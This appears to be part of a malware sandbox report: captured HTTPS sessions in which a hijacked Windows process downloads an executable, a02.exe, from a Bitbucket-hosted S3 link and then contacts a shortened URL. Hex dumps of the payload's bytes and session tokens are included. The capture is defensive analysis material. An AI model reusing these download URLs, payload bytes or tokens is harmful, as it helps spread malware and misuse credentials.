                                                                                                                                                                                                                                                            x-usage-quota-remaining: 997169.559
                                                                                                                                                                                                                                                            vary: Accept-Language, Origin
                                                                                                                                                                                                                                                            x-usage-request-cost: 976.60
                                                                                                                                                                                                                                                            cache-control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            x-b3-traceid: 7a8d22a49b919522
                                                                                                                                                                                                                                                            x-usage-output-ops: 0
                                                                                                                                                                                                                                                            x-used-mesh: False
                                                                                                                                                                                                                                                            x-dc-location: Micros-3
                                                                                                                                                                                                                                                            content-security-policy: frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org app.pendo.io; base-uri 'self'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net app.pendo.io data.pendo.io pendo-static-6266914010103808.storage.googleapis.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net app.pendo.io cdn.pendo.io data.pendo.io pendo-io-static.storage.googleapis.com pendo-static-6266914010103808.storage.googleapis.com https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ app.pendo.io cdn.pendo.io pendo-static-6266914010103808.storage.googleapis.com https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; object-src 'none'; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:00 GMT
                                                                                                                                                                                                                                                            x-usage-user-time: 0.028372
                                                                                                                                                                                                                                                            x-usage-system-time: 0.000926
                                                                                                                                                                                                                                                            location: https://bbuseruploads.s3.amazonaws.com/fe3c402e-d650-43c9-b0ce-c95a11498dde/downloads/666d2627-f56a-4f04-99c5-36905368220f/a02.exe?response-content-disposition=attachment%3B%20filename%3D%22a02.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBZE7SCMA&Signature=HCpifs76QUiUci%2FEbjTZ%2FcagJHI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBsaCXVzLWVhc3QtMSJHMEUCIAL7XL1t3TuPO88R%2FvmGOKGVl7p1Es82eho6cXvQ48VmAiEA7oowtGrg0V2iUhUFhl6H%2Ftflg%2F8yqqvEVz4QKWlhh9IqpwIIJBAAGgw5ODQ1MjUxMDExNDYiDFuIFyQ4tKa%2Be%2FeNTyqEAv3z8s9kfwkGDgSePx2WLCQQKhHTHvRODYsmqld%2BfnPf1j4E%2BbYhYHOLhh0iQz0sdVxhkrXPTKBqSsozj19VUfDopIPVTfRKMeNtRGQezfK2JjXbp8r7euC55noDSYZTIVM6KVVDIPF1tAGWJiFo6%2BMYnFfB2zug1t5HpisPVtMAStx8BqdelSlN37IFcwjn1aKq5iLKOG2ot6gDBMcne8C1p0SybdfD5uWEI6lrqrxtbWm19RY1WYFsJSDkbGmC0LCmMTNlAcqxgj5rGPqMkl4XffgOsPi8NIW0liFniEJ4GkgdiP0nldGzH%2BkY77zsgPaug81QSVfxWv673OeelwZ6wdBpMNTYua8GOp0B8L9l%2BRuxjpbF79wIHItOL1FbFFaPMDUqLn7BHl2kHWntZrPtX5IlaRgQbEYZGTx9IwOvskFyhN7gOZfzOo5jKzjap2b%2Bq12UXPXW48Biok56nWPXv6z27x4KbZddnlzzmD%2FmLERbURyUQwhok2kY3h9GfMX4MN0PiCzQ9hqyr2Z7uiRWWK82G8AlU01254WlEwld0nRAsugFGjj4nw%3D%3D&Expires=1710125916
                                                                                                                                                                                                                                                            expires: Mon, 11 Mar 2024 02:31:00 GMT
                                                                                                                                                                                                                                                            x-served-by: e7bee276ad99
                                                                                                                                                                                                                                                            x-envoy-upstream-service-time: 53
                                                                                                                                                                                                                                                            content-language: en
                                                                                                                                                                                                                                                            x-view-name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                                                                                                                            x-b3-spanid: 7a8d22a49b919522
                                                                                                                                                                                                                                                            x-static-version: 3c039d08312e
                                                                                                                                                                                                                                                            x-render-time: 0.04210543632507324
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            x-usage-input-ops: 0
                                                                                                                                                                                                                                                            x-version: 3c039d08312e
                                                                                                                                                                                                                                                            x-request-count: 3965
                                                                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                            X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            53192.168.2.55562552.217.234.5744344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1119OUTGET /fe3c402e-d650-43c9-b0ce-c95a11498dde/downloads/666d2627-f56a-4f04-99c5-36905368220f/a02.exe?response-content-disposition=attachment%3B%20filename%3D%22a02.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBZE7SCMA&Signature=HCpifs76QUiUci%2FEbjTZ%2FcagJHI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBsaCXVzLWVhc3QtMSJHMEUCIAL7XL1t3TuPO88R%2FvmGOKGVl7p1Es82eho6cXvQ48VmAiEA7oowtGrg0V2iUhUFhl6H%2Ftflg%2F8yqqvEVz4QKWlhh9IqpwIIJBAAGgw5ODQ1MjUxMDExNDYiDFuIFyQ4tKa%2Be%2FeNTyqEAv3z8s9kfwkGDgSePx2WLCQQKhHTHvRODYsmqld%2BfnPf1j4E%2BbYhYHOLhh0iQz0sdVxhkrXPTKBqSsozj19VUfDopIPVTfRKMeNtRGQezfK2JjXbp8r7euC55noDSYZTIVM6KVVDIPF1tAGWJiFo6%2BMYnFfB2zug1t5HpisPVtMAStx8BqdelSlN37IFcwjn1aKq5iLKOG2ot6gDBMcne8C1p0SybdfD5uWEI6lrqrxtbWm19RY1WYFsJSDkbGmC0LCmMTNlAcqxgj5rGPqMkl4XffgOsPi8NIW0liFniEJ4GkgdiP0nldGzH%2BkY77zsgPaug81QSVfxWv673OeelwZ6wdBpMNTYua8GOp0B8L9l%2BRuxjpbF79wIHItOL1FbFFaPMDUqLn7BHl2kHWntZrPtX5IlaRgQbEYZGTx9IwOvskFyhN7gOZfzOo5jKzjap2b%2Bq12UXPXW48Biok56nWPXv6z27x4KbZddnlzzmD%2FmLERbURyUQwhok2kY3h9GfMX4MN0PiCzQ9hqyr2Z7uiRWWK82G8AlU01254WlEwld0nRAsugFGjj4nw%3D%3D&Expires=1710125916 HTTP/1.1
                                                                                                                                                                                                                                                            Host: bbuseruploads.s3.amazonaws.com
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC536INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            x-amz-id-2: LOQJCtLIbKDqb8wTBVS4g5d5QlEDgsdpVToVgWRU+4I4xs2y1dEeQFWxnEl6vNm+Bw0QaRGVAno=
                                                                                                                                                                                                                                                            x-amz-request-id: PNEXEW10T4YGT7YK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:00 GMT
                                                                                                                                                                                                                                                            Last-Modified: Sat, 09 Mar 2024 01:51:54 GMT
                                                                                                                                                                                                                                                            ETag: "d9578a8e9ee343bc53b08fd8101f66e9"
                                                                                                                                                                                                                                                            x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                            x-amz-version-id: P5m1d1MT8MpyYgT1paykScDnj4a0CXh_
                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename="a02.exe"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Server: AmazonS3
                                                                                                                                                                                                                                                            Content-Length: 323584
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 08 61 dd 66 4c 00 b3 35 4c 00 b3 35 4c 00 b3 35 cf 08 ee 35 4e 00 b3 35 6b c6 ce 35 58 00 b3 35 6b c6 de 35 26 00 b3 35 6b c6 dd 35 60 00 b3 35 8f 0f ee 35 43 00 b3 35 4c 00 b2 35 cb 00 b3 35 6b c6 c1 35 4a 00 b3 35 6b c6 cb 35 4d 00 b3 35 52 69 63 68 4c 00 b3 35 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 3f be eb 65 00 00 00 00 00 00 00 00 e0 00 03
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$afL5L5L55N5k5X5k5&5k5`55C5L55k5J5k5M5RichL5PEL?e
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC488INData Raw: 47 01 8b 45 08 5e 5f c9 c3 8d 49 00 8a 06 88 07 8a 46 01 88 47 01 8a 46 02 88 47 02 8b 45 08 5e 5f c9 c3 90 8d 74 31 fc 8d 7c 39 fc f7 c7 03 00 00 00 75 24 c1 e9 02 83 e2 03 83 f9 08 72 0d fd f3 a5 fc ff 24 95 70 41 40 00 8b ff f7 d9 ff 24 8d 20 41 40 00 8d 49 00 8b c7 ba 03 00 00 00 83 f9 04 72 0c 83 e0 03 2b c8 ff 24 85 74 40 40 00 ff 24 8d 70 41 40 00 90 84 40 40 00 a8 40 40 00 d0 40 40 00 8a 46 03 23 d1 88 47 03 83 ee 01 c1 e9 02 83 ef 01 83 f9 08 72 b2 fd f3 a5 fc ff 24 95 70 41 40 00 8d 49 00 8a 46 03 23 d1 88 47 03 8a 46 02 c1 e9 02 88 47 02 83 ee 02 83 ef 02 83 f9 08 72 88 fd f3 a5 fc ff 24 95 70 41 40 00 90 8a 46 03 23 d1 88 47 03 8a 46 02 88 47 02 8a 46 01 c1 e9 02 88 47 01 83 ee 03 83 ef 03 83 f9 08 0f 82 56 ff ff ff fd f3 a5 fc ff 24 95 70 41
                                                                                                                                                                                                                                                            Data Ascii: GE^_IFGFGE^_t1|9u$r$pA@$ A@Ir+$t@@$pA@@@@@@@F#Gr$pA@IF#GFGr$pA@F#GFGFGV$pA
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC9500INData Raw: b0 d4 44 00 ba ac d4 44 00 89 45 e4 85 c0 74 11 39 08 75 2c 8b 48 04 89 4a 04 50 e8 4f e9 ff ff 59 ff 76 04 e8 46 e9 ff ff 59 83 66 04 00 c7 45 fc fe ff ff ff e8 0a 00 00 00 e8 b2 1b 00 00 c3 8b d0 eb c5 6a 0e e8 59 0f 00 00 59 c3 cc cc cc cc cc cc cc cc cc cc cc 8b 54 24 04 8b 4c 24 08 f7 c2 03 00 00 00 75 3c 8b 02 3a 01 75 2e 0a c0 74 26 3a 61 01 75 25 0a e4 74 1d c1 e8 10 3a 41 02 75 19 0a c0 74 11 3a 61 03 75 10 83 c1 04 83 c2 04 0a e4 75 d2 8b ff 33 c0 c3 90 1b c0 d1 e0 83 c0 01 c3 f7 c2 01 00 00 00 74 18 8a 02 83 c2 01 3a 01 75 e7 83 c1 01 0a c0 74 dc f7 c2 02 00 00 00 74 a4 66 8b 02 83 c2 02 3a 01 75 ce 0a c0 74 c6 3a 61 01 75 c5 0a e4 74 bd 83 c1 02 eb 88 51 53 55 56 57 ff 35 70 ed 44 00 e8 da 22 00 00 ff 35 6c ed 44 00 8b f0 89 74 24 18 e8 c9 22
                                                                                                                                                                                                                                                            Data Ascii: DDEt9u,HJPOYvFYfEjYYT$L$u<:u.t&:au%t:Aut:auu3t:uttf:ut:autQSUVW5pD"5lDt$"
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC16384INData Raw: 45 0c 89 46 6c 85 c0 75 08 a1 48 cd 44 00 89 46 6c ff 76 6c e8 e5 3e 00 00 59 c7 45 fc fe ff ff ff e8 06 00 00 00 e8 aa f6 ff ff c3 6a 0c e8 55 ea ff ff 59 c3 56 57 ff 15 68 e0 40 00 8b f8 e8 d6 fe ff ff ff 35 e0 c3 44 00 ff 35 e4 c3 44 00 ff 15 04 e1 40 00 ff d0 8b f0 85 f6 75 4e 68 14 02 00 00 6a 01 e8 32 2c 00 00 8b f0 85 f6 59 59 74 3a 56 ff 35 e0 c3 44 00 ff 35 80 d9 44 00 e8 2a fe ff ff 59 ff d0 85 c0 74 18 6a 00 56 e8 ee fe ff ff 59 59 ff 15 1c e1 40 00 83 4e 04 ff 89 06 eb 09 56 e8 aa c3 ff ff 59 33 f6 57 ff 15 18 e1 40 00 5f 8b c6 5e c3 56 e8 77 ff ff ff 8b f0 85 f6 75 08 6a 10 e8 b7 f7 ff ff 59 8b c6 5e c3 6a 08 68 40 aa 44 00 e8 b4 f5 ff ff 8b 75 08 85 f6 0f 84 ea 00 00 00 8b 46 24 85 c0 74 07 50 e8 5f c3 ff ff 59 8b 46 2c 85 c0 74 07 50 e8 51
                                                                                                                                                                                                                                                            Data Ascii: EFluHDFlvl>YEjUYVWh@5D5D@uNhj2,YYt:V5D5D*YtjVYY@NVY3W@_^VwujY^jh@DuF$tP_YF,tPQ
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC1024INData Raw: 00 05 b4 00 00 00 50 ff d7 5f 5d 5b 8b c6 5e c3 85 ff 74 37 85 c0 74 33 56 8b 30 3b f7 74 28 57 89 38 e8 d7 fe ff ff 85 f6 59 74 1b 56 e8 52 ff ff ff 83 3e 00 59 75 0f 81 fe 70 cc 44 00 74 07 56 e8 78 fd ff ff 59 8b c7 5e c3 33 c0 c3 6a 0c 68 a8 ac 44 00 e8 36 b6 ff ff e8 59 c0 ff ff 8b f0 a1 64 cc 44 00 85 46 70 74 22 83 7e 6c 00 74 1c e8 42 c0 ff ff 8b 70 6c 85 f6 75 08 6a 20 e8 fe b7 ff ff 59 8b c6 e8 49 b6 ff ff c3 6a 0c e8 cc aa ff ff 59 83 65 fc 00 8d 46 6c 8b 3d 48 cd 44 00 e8 69 ff ff ff 89 45 e4 c7 45 fc fe ff ff ff e8 02 00 00 00 eb c1 6a 0c e8 c9 a9 ff ff 59 8b 75 e4 c3 56 57 33 ff 8d b7 58 cd 44 00 ff 36 e8 6d bd ff ff 83 c7 04 83 ff 28 59 89 06 72 e8 5f 5e c3 55 8b ec 83 ec 10 53 56 8b 75 0c 33 db 3b f3 57 8b 7d 10 75 11 3b fb 76 0d 8b 45 08
                                                                                                                                                                                                                                                            Data Ascii: P_][^t7t3V0;t(W8YtVR>YupDtVxY^3jhD6YdDFpt"~ltBpluj YIjYeFl=HDiEEjYuVW3XD6m(Yr_^USVu3;W}u;vE
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC16384INData Raw: 00 c0 75 08 6a 08 ff 15 18 e1 40 00 83 65 e0 00 c7 45 fc fe ff ff ff 8b 45 e0 e8 b6 b2 ff ff c3 53 56 57 8b 54 24 10 8b 44 24 14 8b 4c 24 18 55 52 50 51 51 68 b4 ab 40 00 64 ff 35 00 00 00 00 a1 64 c0 44 00 33 c4 89 44 24 08 64 89 25 00 00 00 00 8b 44 24 30 8b 58 08 8b 4c 24 2c 33 19 8b 70 0c 83 fe fe 74 3b 8b 54 24 34 83 fa fe 74 04 3b f2 76 2e 8d 34 76 8d 5c b3 10 8b 0b 89 48 0c 83 7b 04 00 75 cc 68 01 01 00 00 8b 43 08 e8 26 10 00 00 b9 01 00 00 00 8b 43 08 e8 38 10 00 00 eb b0 64 8f 05 00 00 00 00 83 c4 18 5f 5e 5b c3 8b 4c 24 04 f7 41 04 06 00 00 00 b8 01 00 00 00 74 33 8b 44 24 08 8b 48 08 33 c8 e8 d7 7b ff ff 55 8b 68 18 ff 70 0c ff 70 10 ff 70 14 e8 3e ff ff ff 83 c4 0c 5d 8b 44 24 08 8b 54 24 10 89 02 b8 03 00 00 00 c3 55 8b 4c 24 08 8b 29 ff 71
                                                                                                                                                                                                                                                            Data Ascii: uj@eEESVWT$D$L$URPQQh@d5dD3D$d%D$0XL$,3pt;T$4t;v.4v\H{uhC&C8d_^[L$At3D$H3{Uhppp>]D$T$UL$)q
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC1024INData Raw: 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 60 6d 61 6e 61 67 65 64 20 76 65 63 74 6f 72 20 64 65 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 00 60 6d 61 6e 61 67 65 64 20 76 65 63 74 6f 72 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 60 70 6c 61 63 65 6d 65 6e 74 20 64 65 6c 65 74 65 5b 5d 20 63 6c 6f 73 75 72 65 27 00 00 00 00 60 70 6c 61 63 65 6d 65 6e 74 20 64 65 6c 65 74 65 20 63 6c 6f 73 75 72 65 27 00 00 60 6f 6d 6e 69 20 63 61 6c 6c 73 69 67 27 00 00 20 64 65 6c 65 74 65 5b 5d 00 00 00 20 6e 65 77 5b 5d 00 00 60 6c 6f 63 61 6c 20 76 66 74 61 62 6c 65 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 63 6c 6f 73 75 72 65 27 00 60 6c 6f 63 61 6c 20 76 66 74 61 62 6c 65 27 00 60 52 54
                                                                                                                                                                                                                                                            Data Ascii: constructor iterator'`managed vector destructor iterator'`managed vector constructor iterator'`placement delete[] closure'`placement delete closure'`omni callsig' delete[] new[]`local vftable constructor closure'`local vftable'`RT
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC16384INData Raw: e8 ee 40 00 dc ee 40 00 d0 ee 40 00 c4 ee 40 00 b8 ee 40 00 ac ee 40 00 a4 ee 40 00 98 ee 40 00 8c ee 40 00 3e 9f 44 00 dc e9 40 00 c0 e9 40 00 ac e9 40 00 8c e9 40 00 70 e9 40 00 84 ee 40 00 7c ee 40 00 78 a4 44 00 78 ee 40 00 74 ee 40 00 70 ee 40 00 6c ee 40 00 68 ee 40 00 64 ee 40 00 58 ee 40 00 54 ee 40 00 50 ee 40 00 4c ee 40 00 74 a4 44 00 48 ee 40 00 44 ee 40 00 7c a4 44 00 40 ee 40 00 6c a4 44 00 3c ee 40 00 38 ee 40 00 34 ee 40 00 30 ee 40 00 2c ee 40 00 28 ee 40 00 24 ee 40 00 20 ee 40 00 1c ee 40 00 18 ee 40 00 14 ee 40 00 10 ee 40 00 0c ee 40 00 08 ee 40 00 04 ee 40 00 00 ee 40 00 fc ed 40 00 f8 ed 40 00 f4 ed 40 00 f0 ed 40 00 ec ed 40 00 e8 ed 40 00 dc ed 40 00 d0 ed 40 00 c8 ed 40 00 bc ed 40 00 a4 ed 40 00 98 ed 40 00 84 ed 40 00 64 ed 40
                                                                                                                                                                                                                                                            Data Ascii: @@@@@@@@@>D@@@@p@@|@xDx@t@p@l@h@d@X@T@P@L@tDH@D@|D@@lD<@8@4@0@,@(@$@ @@@@@@@@@@@@@@@@@@@@@@d@
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC1024INData Raw: 52 e8 88 20 00 00 8b 46 14 2b c7 83 c4 10 83 7e 18 10 89 46 14 72 03 8b 6d 00 c6 04 28 00 5d 5f 8b c6 5e 5b c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 88 fc 40 00 64 a1 00 00 00 00 50 83 ec 30 a1 28 c0 41 00 33 c5 89 45 ec 53 56 57 50 8d 45 f4 64 a3 00 00 00 00 89 65 f0 8b 45 08 6a ff 33 f6 8b d9 56 50 8d 4d d0 89 5d c8 c7 45 e8 0f 00 00 00 89 75 e4 c6 45 d4 00 e8 be fb ff ff 89 75 fc 8b 4b 04 3b ce 74 18 8b 7b 0c 2b f9 b8 93 24 49 92 f7 ef 03 d7 c1 fa 04 8b f2 c1 ee 1f 03 f2 85 c9 75 04 33 c0 eb 18 8b 7b 08 2b f9 b8 93 24 49 92 f7 ef 03 d7 c1 fa 04 8b c2 c1 e8 1f 03 c2 ba 49 92 24 09 2b d0 83 fa 01 73 05 e8 9b 02 00 00 85 c9 75 04 33 c0 eb 18 8b 7b 08 2b f9 b8 93 24 49 92 f7 ef 03 d7 c1 fa 04 8b c2 c1 e8 1f 03 c2 83 c0 01 3b f0 0f
                                                                                                                                                                                                                                                            Data Ascii: R F+~Frm(]_^[Ujh@dP0(A3ESVWPEdeEj3VPM]EuEuK;t{+$Iu3{+$II$+su3{+$I;
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC16384INData Raw: 00 00 00 00 2b d1 03 d2 03 d2 52 e8 10 22 00 00 83 c4 04 83 c4 10 c3 83 c8 ff 33 d2 f7 f1 83 f8 1c 73 da 8d 04 24 50 8d 4c 24 08 c7 44 24 04 00 00 00 00 e8 c2 1c 00 00 68 e0 9f 41 00 8d 4c 24 08 51 c7 44 24 0c bc 02 41 00 e8 d7 57 00 00 cc cc cc cc cc 8b 44 24 04 56 50 8b f1 e8 63 e0 ff ff c7 06 c4 1b 41 00 8b c6 5e c2 04 00 cc cc cc cc cc cc cc 55 8b ec 6a ff 68 10 fa 40 00 64 a1 00 00 00 00 50 83 ec 1c 53 56 57 a1 28 c0 41 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 89 65 f0 8b f9 89 7d ec 8b 45 08 8b f0 83 ce 0f 83 fe fe 76 04 8b f0 eb 22 8b 5f 18 b8 ab aa aa aa f7 e6 8b cb d1 e9 d1 ea 3b d1 73 0e b8 fe ff ff ff 2b c1 3b d8 77 03 8d 34 19 33 db 8d 4e 01 3b cb 89 5d fc 77 10 33 c9 51 e8 35 21 00 00 83 c4 04 89 45 08 eb 58 83 c8 ff 33 d2 f7 f1 83 f8 01 73 e6
                                                                                                                                                                                                                                                            Data Ascii: +R"3s$PL$D$hAL$QD$AWD$VPcA^Ujh@dPSVW(A3PEde}Ev"_;s+;w43N;]w3Q5!EX3s


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            54192.168.2.555630172.67.200.21944344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC38OUTGET /ppg8x HTTP/1.1
                                                                                                                                                                                                                                                            Host: sty.ink
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC1188INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:00 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Cache-Control: no-cache, private
                                                                                                                                                                                                                                                            Set-Cookie: XSRF-TOKEN=eyJpdiI6ImhBMCtidk8vcU5YOVROR3pvcnljZXc9PSIsInZhbHVlIjoiV0UyRlB6Rkdzb3htdVd4RTlVOVJLWnF5Zy9UWjIyN1F2eFFwWlBqSTY2akQzSnlSMXUyYVBQc1JmK0RuWWNTanFFV3pGcVdpWXFGMHJrRG1FK3NqczhqUWdRMWp3a1ZpSGgzc1JRYjI5ZGs1WTZJcHNyYThpa2pmQmpuaDBRbFoiLCJtYWMiOiI0MWUzYWY0OWI0Mjk2Y2U2MjMzMWQ2MmMxNzFkMDhkMmFkNjU5ZDk4NmY5ZGE3NzI5NjExODdkNTA5YTY2ZTJmIiwidGFnIjoiIn0%3D; expires=Mon, 11 Mar 2024 04:31:00 GMT; Max-Age=7200; path=/; secure
                                                                                                                                                                                                                                                            set-cookie: shortiny_session=eyJpdiI6IlpwY1R1QnBWZW9MdFVnTFduTlNhSnc9PSIsInZhbHVlIjoiUktHb1lyOUJQOUtBYnZ1VVNBM2xRRHlZbm83a0t5dXZpblhjVXQxcEZHcTQzalUwTjFaSnkwd1RDeHh0RFg1djM0WDFiR2dBUXpTUUF1VjY0OC9obDlKUjhMNzgvVFZmMHJzVXgrZDlPTDFVOWRQVFZOWlNCblVuUkZjNnBlalUiLCJtYWMiOiJlZDVkN2VjNTE2YjYyN2NjZDM4Y2VhZmEwYjdkY2NiYmJlMjliZmJlMmRkZGExMTExM2QxMWVjZDE4YTUzMjNmIiwidGFnIjoiIn0%3D; expires=Mon, 11 Mar 2024 04:31:00 GMT; Max-Age=7200; path=/; httponly
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=15768000
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC397INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 57 58 45 6c 41 64 31 42 25 32 46 53 77 58 62 70 59 6a 67 79 68 63 76 6d 70 48 52 6d 6f 33 62 63 52 54 53 67 32 6a 52 52 6a 67 5a 79 59 6d 48 41 4b 38 56 66 39 5a 67 7a 61 77 7a 41 77 6d 66 4f 6e 5a 36 71 49 47 46 51 61 49 25 32 42 68 57 56 77 25 32 42 63 6e 6c 4c 7a 35 25 32 46 61 72 42 42 46 59 4d 52 57 4f 6c 48 32 25 32 42 4d 32 6a 4a 6c 67 5a 78 66 39 79 51 50 48 77 50 71 46 38 33 53 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22
                                                                                                                                                                                                                                                            Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WXElAd1B%2FSwXbpYjgyhcvmpHRmo3bcRTSg2jRRjgZyYmHAK8Vf9ZgzawzAwmfOnZ6qIGFQaI%2BhWVw%2BcnlLz5%2FarBBFYMRWOlH2%2BM2jJlgZxf9yQPHwPqF83S"}],"group":"cf-nel","max_age":604800}NEL: {"
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC1369INData Raw: 65 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 68 2d 31 30 30 20 73 63 72 6f 6c 6c 2d 62 65 68 61 76 69 6f 72 2d 73 6d 6f 6f 74 68 20 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 43 53 52 46 20 54 6f 6b 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22
